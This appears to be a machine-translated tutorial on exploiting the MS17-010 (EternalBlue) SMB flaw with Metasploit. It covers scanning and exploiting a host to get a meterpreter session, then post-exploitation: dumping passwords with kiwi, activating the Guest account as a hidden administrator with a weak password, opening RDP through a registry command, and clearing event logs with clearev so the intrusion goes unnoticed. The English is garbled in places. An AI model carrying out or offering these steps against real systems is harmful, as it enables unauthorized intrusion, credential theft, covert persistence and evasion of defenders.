Ms17-010 Eternal Blue vulnerability of MSF

**

The main idea of the article ：

**
1. be familiar with msf The basic usage of .
2. Be familiar with some of the basic windows command .
3. Repeat the blue hole of eternity .

Loophole principle ：

Through to the Windows Server's SMBv1 The service sends a crafted command, causing an overflow , It eventually leads to the execution of arbitrary commands . stay Windows Operating system ,SMB The service is on by default , The listening port defaults to 445, Therefore, the impact of this vulnerability is great .

**

MSF Common commands ：

	show exploits  Displays the available penetration attack modules 
    search  Used to search for some penetration attack modules , Fuzzy matching can be done 
    use  Use a penetration attack module , Can pass use Command to use show perhaps search Out of the penetration module 
    show payloads  Displays the available attack payloads for the current module 
    show options  Display parameters when the penetration module is selected , Use show options The parameters to be set for this module will be displayed 
    set The command is used to set some options , For example, use set Command settings , Attack module options Parameters ; Set attack load payloads when , Also use set command .
    exploit/run command , When all parameters are set , Use exploit command , Start attacking 

Exploit process ：

**
1. open MSF It's integrated by default MS17-010 Vulnerability test module

utilize search Syntax lookup ms17-010

2. Detect whether the host has vulnerabilities , utilize use Command selects the third test interface , It can detect whether the host has an eternal blue vulnerability , among show options Is to view the parameters to be configured , There is no destination host RHOSTS So we have to match .

To configure RHOSTS The target host ip（ The target host here can also be a network segment ）, And use run start-up , The result is shown in Fig. , Indicates a vulnerability .
3. After knowing that there are loopholes , Start using payload attack , Input use 0 Enter the attack interface , Prompt to configure parameters , utilize show options View the parameters to be configured

First , Configure the target host RHOSTS, Then configure payload type （ This type defaults to 64 Bit host , If it is 32 Bit needs to download the corresponding script. After importing, the settings will X64 Remove it ）, Configure the port to which this computer is connected

Configure the parameters to pass run or exploit The startup script , See meterpreter Is to take advantage of success .

After successful use , We can do the following ：
1. You can use the screenshot command screenshot Intercept the vulnerable Machine page

The effect of interception is as follows ：

2. It can also be used upload and download Upload and download files

3. utilize load kiwi Command to crack the password of the active account of the host ,creds_all see

4. It can be done by shell The command enters the command line of the vulnerable machine administrator , If command line garbled code is available chcp 65001 Tone code into UTF-8,chcp 936 It's changed to GBK.

For the convenience of operation or further operation , If you want to log in to the host, you can log in through the remote port , But before that, we need to use Guest account number （ because Guest The account is the guest account of the system , If you log in with another account , Easy to arouse suspicion ）
Activate Guest Account , You can also create an account , But new accounts are easy to find .

// Activate Guest Account 
net user Guest /active:yes
// Will activate Guest User rights are elevated to the administrator account group 
net localgroup administrator Guest /add
// Change user password 
net user Guest 123

After completing the user operation, we need to use remote login , So open 3389 port , This is a remote access port .

// open 3389 Port command 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections
 /t REG_DWORD /d 00000000 /f

// close 3389 Port command , Just put 00000000 become 11111111
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections
 /t REG_DWORD /d 11111111 /f

Open another command line to pass rdesktop Command remote login to miss boarding

Enter the password obtained before to enter the vulnerable machine

5. To prevent being caught , Finally, you can use clearev Order the trace to be cleared , Will clear the system , Security , Application history log .

The renderings are as follows ：

command ： Vulnerable machines can be used netstat ano Check the port link status , Later, the defender will check the attack traces .